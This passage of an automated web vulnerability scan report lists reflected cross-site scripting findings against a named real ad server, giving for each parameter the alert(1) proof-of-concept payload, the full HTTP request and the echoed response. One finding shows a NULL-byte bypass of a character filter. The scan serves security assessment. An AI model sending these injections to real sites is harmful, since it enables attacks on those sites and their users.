Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:31 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=575e057<a>9282d93155d&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='200
...[SNIP]...

2.81. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 1cbfb<script>alert(1)</script>8f03840118e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=571cbfb<script>alert(1)</script>8f03840118e&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86971413&ADREQ&SP=234&POS=100&cookiesOn=1&divId=cbs-pushdown&ADREQ&SP=266&POS=100&cookiesOn=1&divId=ads_magnet HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:10 GMT
Server: Apache/2.2
Content-Length: 1938
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:10 GMT

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlog.com.com/adlog/i/r=17584&amp;sg=1815&amp;o=1%253a&amp;h=cn&amp;p=2&amp;b=571cbfb<script>alert(1)</script>8f03840118e&amp;l=en_US&amp;site=164&amp;pt=2000&amp;nd=1&amp;pid=&amp;cid=&amp;pp=100&amp;e=&amp;rqid=01phx1-ad-e16:4E88DDCCDFF58&amp;orh=cbs.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=www.
...[SNIP]...

2.82. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd1c6'%3balert(1)//2484adf95d3 was submitted in the BRAND parameter. This input was echoed as fd1c6';alert(1)//2484adf95d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57fd1c6'%3balert(1)//2484adf95d3&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:03 GMT
Server: Apache/2.2
Content-Length: 1121
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57fd1c6'%3balert(1)//2484adf95d3&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17828&amp;sg=1815&amp;o=1%253a&amp;h=cn&amp;p=2&amp;b=57fd1c6';alert(1)//2484adf95d3&amp;l=en_US&amp;site=164&amp;pt=2000&amp;nd=1&amp;pid=&amp;cid=&amp;pp=100&amp;e=&amp;rqid=01phx1-ad-e17:4E88AD4D3D3DC3&amp;orh=cbs.com&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=www
...[SNIP]...

2.83. http://mads.cbs.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload c3393*/alert(1)//d130cefde2e was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57c3393*/alert(1)//d130cefde2e&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:05 GMT
Server: Apache/2.2
Content-Length: 1119
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57c3393*/alert(1)//d130cefde2e&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.84. http://mads.cbs.com/mac-ad [CELT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 99188<a>457eb383b9e was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js99188<a>457eb383b9e&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:49 GMT
Server: Apache/2.2
Content-Length: 511
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Sun, 02 Oct 2011 22:59:49 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js99188<a>457eb383b9e&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" -->
...[SNIP]...

2.85. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 6122c*/alert(1)//2a51957cbdd was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=6122c*/alert(1)//2a51957cbdd&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:37 GMT
Server: Apache/2.2
Content-Length: 1132
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:37 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=6122c*/alert(1)//2a51957cbdd&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.86. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 4f99c<a>f732ff8463b was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=4f99c<a>f732ff8463b&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:19 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:19 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=4f99c<a>f732ff8463b&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEAC
...[SNIP]...

2.87. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 18e97<a>24acc9741b7 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US18e97<a>24acc9741b7&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:03:56 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:03:56 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US18e97<a>24acc9741b7&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:
...[SNIP]...

2.88. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 23b18*/alert(1)//1007f56aa9 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US23b18*/alert(1)//1007f56aa9&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:02:31 GMT
Server: Apache/2.2
Content-Length: 1131
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:02:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US23b18*/alert(1)//1007f56aa9&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.89. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 390bc<a>2cca7161cf2 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c390bc<a>2cca7161cf2&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:55 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c390bc<a>2cca7161cf2&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CI
...[SNIP]...

2.90. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 30f18*/alert(1)//36fc8e73e80 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c30f18*/alert(1)//36fc8e73e80&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:01:21 GMT
Server: Apache/2.2
Content-Length: 1133
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 23:01:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c30f18*/alert(1)//36fc8e73e80&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

2.91. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 471e1<a>88535f3e092 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS471e1<a>88535f3e092&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:45 GMT
Server: Apache/2.2
Content-Length: 489
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 22:59:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS471e1<a>88535f3e092&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=58164046&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS:
...[SNIP]...

2.92. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload bbb4e*/alert(1)//4de806e075b was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJSbbb4e*/alert(1)//4de806e075b&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=c%3Bpage%3Dcbshome; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:59:44 GMT
Server: Apache/2.2
Content-Length: 1092
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 02 Oct 2011 22:59:44 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSbbb4e*/alert(1)//4de806e075b&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=c&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=78325244&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.wri
...[SNIP]...

2.93. http://mads.cbs.com/mac-ad [META&ADSEPARATOR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the META&ADSEPARATOR request parameter is copied into the HTML document as plain text between tags. The payload %0029242<script>alert(1)</script>c7413a93569 was submitted in the META&ADSEPARATOR parameter. This input was echoed as 29242<script>alert(1)</script>c7413a93569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

